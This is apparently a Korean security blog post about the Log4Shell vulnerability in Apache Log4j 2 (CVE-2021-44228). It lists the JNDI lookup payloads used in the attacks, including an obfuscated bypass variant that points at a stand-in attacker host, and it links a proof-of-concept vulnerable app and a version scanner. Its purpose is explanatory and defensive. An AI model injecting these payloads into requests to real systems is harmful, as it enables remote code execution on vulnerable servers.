300x250
Apache Log4j 2 취약점 (CVE-2021-44228 / Log4Shell) PoC 및 취약점 스캐너
* 공격 구문 형식
- 주요 공격구문 : ${jndi:ldap://xxx.xxx.xxx/z} , ${jndi:rmi://xxx.xxx.xxx/z}
- HTTP URL, Header, body에 삽입하여 다수 공격 시도 (Zgrab과 같은 취약점 스캐너를 이동한 자동화 공격)
- 대소문자 및 아래와 같은 변형된 형식으로 인입도 가능.
ex) ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}
- 출처 : https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
* 현재 공유된 CVE-2021-44228 PoC
- 취약 어플리케이션으로 docker image로 제공
- 출처: https://www.lunasec.io/docs/blog/log4j-zero-day/
* CVE-2021-44228 취약점 스캐너
- Window, Linux, Unix 환경에서 Log4j2 취약 버전 사용 유무 체크
- 출처 : https://github.com/logpresso/CVE-2021-44228-Scanner
반응형
'IT Security > Vulnerability' 카테고리의 다른 글
취약점) Log4Shell 취약점 점검 스캐너 - logpress (CVE-2021-44228 / CVE-2021-45046) (3) | 2021.12.16 |
---|---|
[긴급] 취약점) CVE-2021-45046 - Apache Log4j2 신규 취약점 발견 및 패치 배포 (21.12.15) (0) | 2021.12.15 |
[긴급] 취약점) Apache Log4j 2 취약점 (CVE-2021-44228) (0) | 2021.12.12 |
취약점) XXE Injection (0) | 2021.11.01 |
취약점) CVE-2019–11581 Jira 원격 코드 실행 취약점 (0) | 2020.04.05 |